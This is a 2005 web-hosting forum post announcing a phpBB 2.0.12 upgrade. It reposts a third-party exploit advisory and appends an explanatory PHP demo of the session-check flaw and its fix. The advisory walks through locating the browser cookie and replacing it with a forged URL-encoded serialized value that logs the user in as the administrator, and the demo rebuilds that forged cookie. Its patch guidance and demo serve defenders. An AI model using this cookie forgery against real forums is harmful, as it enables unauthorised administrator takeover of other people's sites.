ewiget
Admin
new phpbb exploits - 2005/03/04 23:01

PHPBB is a very popular message forum in which two new exploits and Proof of Concept (POC) code have begun circulating. For this reason, we have manually upgraded all of our client sites that are running version 2.12 or lower, either the stand-alone version or the one included with several CMS (Content Management Systems). The current version, which does not have the exploits, is version 2.13.

You can download version 2.13, if you do not already have this version installed, from either the main PHPbb web site at http://www.phpbb.net or, for the PHPNuke version, at http://www.nukeresources.com

You can also manually patch your phpBB installation by modifying the includes/sessions.php file like this:

* in "includes/sessions.php" replace code:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Code:
 if( $sessiondata['autologinid'] == $auto_login_key )

replace with:

Code:
 if( $sessiondata['autologinid'] === $auto_login_key )

----------------------------------
Exploit:
-----------------------------------

phpBB 2.0.12 Session Handling
Administrator Authentication
Bypass EXPLOIT -SIMPLIFIED-
- By PPC^Rebyte

-----------------------------------

03 March 2005

** DUTCH VERSION BELOW **

[ ENGLISH VERSION ]

*** Status
__________

phpBB has already been informed about this exploit and has released a
'critical update' on 27 February 2005; however, most forums are still running
version 2.0.12 or lower.

VULNERABLE:
- 2.0.x --> 2.0.12

IMMUNE:
- 2.0.13 or newer


1* Intro
________

The discoverer of this bug is unknown, says "Paisterist", who wrote a C exploit
for this bug.

Link to Paisterist's exploit at Packetstormsecurity:
http://packetstormsecurity.org/0503-exploits/phpbbsession.c

This program didn't work as it should on my PC, so I had to find a way
for myself to exploit the bug manually.
This seemed to be much easier than compiling that C exploit and fooling around
with it until it eventually still doesn't work (in my case).
This simplified manual method I'll describe can also be used with Internet
Explorer or other browsers instead of only Mozilla/Firefox.


2* The bug
__________

We're going to edit a cookie so that when you visit a certain forum another
time you will get logged in having admin rights. This is possible due to a
bug in includes/sessions.php:

Code:
 if( $sessiondata['autologinid'] == $auto_login_key )

3* Preparation
______________

1. Register at forum?

2. Log in with account
+ UNCHECK "Log in automatically"

3. Close browser to be sure a cookie is made.

4. Locate cookie
*firefox: X:\Documents and Settings\Name\Application Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt
--> search the .txt for the domain name (domain.tld)
--> default cookie name = phpbbmysql
*iexplorer: X:\Documents and Settings\Name\Cookies\Name@domain.tld
--> default cookie name = phpbbmysql

4* Let's Xploit!
________________

Open the cookie in a text editor and search for a line that resembles:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Code:
 a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

(the "X" near the end is your 'user id')

Replace this with:

Code:
 a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

(2 = 'user id' of admin)

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Save cookie and close.
Open your browser and surf to forum.

You'll now be automatically logged in having admin rights.


5* Solution
___________

* Update phpBB to version 2.0.13

- or -

* in "includes/sessions.php" replace code:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Code:
 if( $sessiondata['autologinid'] == $auto_login_key )

replace with:

Code:
 if( $sessiondata['autologinid'] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


6* Outro
________

THE.END

Greetings 2 everyone at Rebyte and the whole Belgian scene !!
Additional greetings 2 Paisterist for the original C exploit !

-- PPC^Rebyte --
-- ppc@respected.as -
Ed Wiget
Technical Support
http://www.xtremewebhosts.com
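As an added example (not part of the post above and not phpBB's own code), the PHP below models the one-line check quoted in the advisory, the 2.0.13 one-character fix, and a hardened validation routine. It shows why PHP's loose == accepts a cookie whose autologinid has been replaced by the serialized boolean b:1: the comparison converts the stored key to a boolean, and any non-empty string is true. The stored key value, the function names and the cookie-decoding helper are assumptions made for this demo; the two cookie strings are constructed from the values quoted in the advisory, with user id 5 in place of X.

```php
<?php
// Added example, not phpBB's code: a model of the autologin check quoted in
// the post, the one-character fix, and a hardened alternative.
// Assumptions: $auto_login_key is the key string stored server-side for the
// user; function names and the sample key below are made up for this demo.

// phpBB 2.0.x stores the session cookie as a URL-encoded serialized PHP array.
// 'allowed_classes' => false (PHP >= 7.0) keeps unserialize() from building
// objects out of attacker-supplied data.
function decode_session_cookie($raw)
{
    $data = @unserialize(urldecode($raw), array('allowed_classes' => false));
    return is_array($data) ? $data : false;
}

// The 2.0.12 line as quoted above. Loose == converts the other operand to
// the cookie value's type, so a boolean true matches any non-empty key.
function autologin_check_loose($sessiondata, $auto_login_key)
{
    return $sessiondata['autologinid'] == $auto_login_key;
}

// The 2.0.13 line as quoted above: identical type and value required.
function autologin_check_strict($sessiondata, $auto_login_key)
{
    return $sessiondata['autologinid'] === $auto_login_key;
}

// Hardened variant (this demo's own): validate the cookie's shape first,
// never accept an empty key on either side, and compare in constant time.
function autologin_check_hardened($sessiondata, $auto_login_key)
{
    if (!is_array($sessiondata)
        || !isset($sessiondata['autologinid'], $sessiondata['userid'])
        || !is_string($sessiondata['autologinid'])
        || !is_string($sessiondata['userid'])
        || !preg_match('/^[0-9]+$/', $sessiondata['userid'])) {
        return false; // wrong shape or type: a tampered cookie, not a login
    }
    if (!is_string($auto_login_key)
        || $auto_login_key === ''
        || $sessiondata['autologinid'] === '') {
        return false; // no autologin key on record, so nothing can match it
    }
    return hash_equals($auto_login_key, $sessiondata['autologinid']); // PHP >= 5.6
}

// Constructed inputs. The first cookie is the normal one from the advisory with
// user id 5 in place of X; the second is the forged one with autologinid
// replaced by the serialized boolean b:1 and userid set to 2.
$stored_key    = 'e3b0c44298fc1c149afbf4c8996fb924';            // hypothetical key
$normal_cookie = 'a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B'
               . 's%3A6%3A%22userid%22%3Bs%3A1%3A%225%22%3B%7D';
$forged_cookie = 'a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B'
               . 's%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D';

foreach (array('normal' => $normal_cookie, 'forged' => $forged_cookie) as $label => $cookie) {
    $sd = decode_session_cookie($cookie);
    printf("%-6s autologinid type=%-7s loose=%-5s strict=%-5s hardened=%s\n",
        $label,
        gettype($sd['autologinid']),
        var_export(autologin_check_loose($sd, $stored_key), true),
        var_export(autologin_check_strict($sd, $stored_key), true),
        var_export(autologin_check_hardened($sd, $stored_key), true));
}
```

Run it with the php command-line binary. For the forged cookie the loose check returns true while the strict and hardened checks return false; for the normal cookie all three return false. The hardened routine also closes a gap the one-character patch leaves open in this model: if the stored key is empty (the user never chose "Log in automatically") and the cookie carries the empty autologinid shown in the first cookie, both == and === compare two empty strings and succeed. A cookie whose autologinid decodes to anything other than a string is itself a sign of tampering worth logging.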
leandro
Visitor
 
Re:new phpbb exploits - 2005/12/02 23:32 daeeeeeeee
leandro
Visitor
 
Re:new phpbb exploits - 2005/12/02 23:33 daeeeeeeee
© 2009 Xtreme Web Hosts - Professional web site hosting, business website hosting and domain names